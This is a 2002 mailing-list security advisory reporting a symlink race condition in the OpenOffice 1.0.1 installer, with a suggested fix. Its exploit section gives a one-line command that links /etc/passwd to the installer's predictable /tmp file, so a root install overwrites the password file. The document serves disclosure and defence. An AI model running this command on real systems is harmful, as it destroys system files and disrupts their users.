OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Larry W. Cashdollar (lwc_at_vapid.ath.cx)
Date: Fri Oct 11 2002 - 08:51:22 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

                             Vapid Labs
                        Larry W. Cashdollar
                              9/9/02

    Summary: OpenOffice 1.0.1 Race condition during installation can overwrite
    system files.

    Severity: Low

    Description: A very simple and easy to exploit race condition exist during the
     installation of OpenOffice. During this window a malicous user could create a
     symlink in /tmp and overwrite arbitrary files.

    Exploit:

    As a normal user:

    lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf

    Where $USERNAME is the installer account name, probably root.

    will result in the password file being over written with:

    # create the proper autoresponse file
    cat << EOF > /tmp/${USER}_autoresponse.conf
    [ENVIRONMENT]
    INSTALLATIONMODE=$installtype
    INSTALLATIONTYPE=STANDARD
    DESTINATIONPATH=$prefix/$oo_home
    OUTERPATH=
    LOGFILE=
    LANGUAGELIST=<LANGUAGE>

    [JAVA]
    JavaSupport=preinstalled_or_none

    EOF

    Fix:
        Create a directory under /tmp to work from. With restrictive permissions.

    References:

    http://www.openoffice.org/dev_docs/source/1.0.1/index.html

    Larry W. Cashdollar
    lwcvapid.ath.cx
    http://vapid.ath.cx